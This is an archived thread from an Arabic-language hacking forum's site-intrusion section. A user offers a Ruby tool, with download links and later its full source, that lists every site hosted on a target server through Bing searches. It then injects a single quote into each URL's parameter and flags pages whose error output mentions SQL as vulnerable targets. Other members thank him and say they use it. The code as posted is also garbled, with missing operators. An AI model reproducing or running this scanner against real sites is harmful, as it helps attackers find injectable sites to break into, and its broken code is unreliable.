:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   #[حصريا] اداة لاستخراج المواقع المصابة ب sql من سيرفر (http://www.vbspiders.com/vb/t57078.html)

Mcool 07-22-2011 12:47 PM
#[حصريا] اداة لاستخراج المواقع المصابة ب sql من سيرفر
 
السلام عليكم و رحمة الله و بركاتة
لقد لاحظت ان مشكلة استهداف المواقع تكمن في استخراج المواقع المصابة خاصة ادا كان السيرفر يحتوي على عدة مواقع لدلك برمجة اداة بالروبي تقوم باستخراج المواقع المصابة بتغرة sql
التحميل
http://www.mediafire.com/?jb5ka94djje4ep7

اي استفسار انا موجود

و من فضلكم اعطوني رايكم حول هده الأداة

cisco_security 07-22-2011 01:50 PM
اها ممكن توضح اكثر عن طريقه عمل الاداة يا مان ؟
و لا ممكن شرح عنها بالتطبيق
و مشكور مسبقا

Mcool 07-22-2011 02:35 PM
اعدروني نسيت وضع الشرح
الشرح عبارة عن فيديو فلاشي افتحه بالمتصفح

الشرح:http://www.mediafire.com/?95h78dw0w49ea4f

AhMaD-HaWLeRY 07-22-2011 03:33 PM
مشكور أخي

bleu moon 07-22-2011 04:16 PM
يعطيك الخير يا غالي ...

abdellatef 07-27-2011 04:09 AM
رائعا طبعا اخوي حمزة كل شغلي الان بها :)

لكن يلزمك تطروها لكي لا تتعبنا بوضع عدد الصفحات

DR.THMoORY 07-27-2011 04:42 AM
بطل اخوي يسلمو..

Mcool 07-27-2011 02:18 PM
مناك تغيير بسيط في السكريبت فقط من اجل اعطاء نتائج اكتر
كود PHP:
#/usr/bin/env ruby
# SQL_extractor by hamza119944 
# e-mail : hamzarex@hotmail.f

require 'net/http'


def web_count(server_ip,variable)
    file File.new("website.txt","w")
    (0..6).each do |pages|
        req Net::HTTP.get_response(URI.parse("http://www.bing.com/search?q=ip%3a#{server_ip}+%22.php%3f#{variable}%3d%22&go=&filt=all&first=#{pages*10 + 1}&FORM=PERE1")) #get the request
        bodys req.body
        my_array bodys.split('"')  # split the text
        my_array.each do |words
            if words.scan("#{variable}=").size 0 then #scan for the .php?id=
                if words.scan("http://").size 0 then
                    file.puts words
                end    
            end
        end        
    end
    file.close
end
def check_sql()
    file File.open("website.txt","r")
    file.each_line do |x|
        web_v x+"'"
        web_v["\n"]=""
        sql Net::HTTP.get_response(URI.parse(web_v))
        if sql.body.downcase.scan("sql").size 0 then
            puts "this web is vulnerable : #{x}"
        end
    end
end

if ARGV.size .eql?(2) == false 
    puts "\nusage [server ip] [variable] ex: ruby SQL_extractor 127.0.0.1 id "
else 
    begin 
        puts "################################"
        puts "# SQL_extractor by hamza119944 #"
        puts "# e-mail : hamzarex@hotmail.fr #\n"
        puts "################################"
        web_count(ARGV[0],ARGV[1])
        check_sql()
    rescue
        puts "can't extract website"
    end
end 

ssmba 07-28-2011 01:54 PM
جميل جدا جري العمل بالأداة

التل الصامت 07-28-2011 03:20 PM
اداه كويسه تسلم يمينك يا بطل
..

sam.zzz 01-17-2014 07:07 AM
رد: #[حصريا] اداة لاستخراج المواقع المصابة ب sql من سيرفر
 
مشكوررررررررررر

Hexo 01-18-2014 02:00 AM
رد: #[حصريا] اداة لاستخراج المواقع المصابة ب sql من سيرفر
 
goof

tito4418 01-19-2014 12:56 PM
رد: #[حصريا] اداة لاستخراج المواقع المصابة ب sql من سيرفر
 
niceeeeeeeeeeee


الساعة الآن 08:41 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0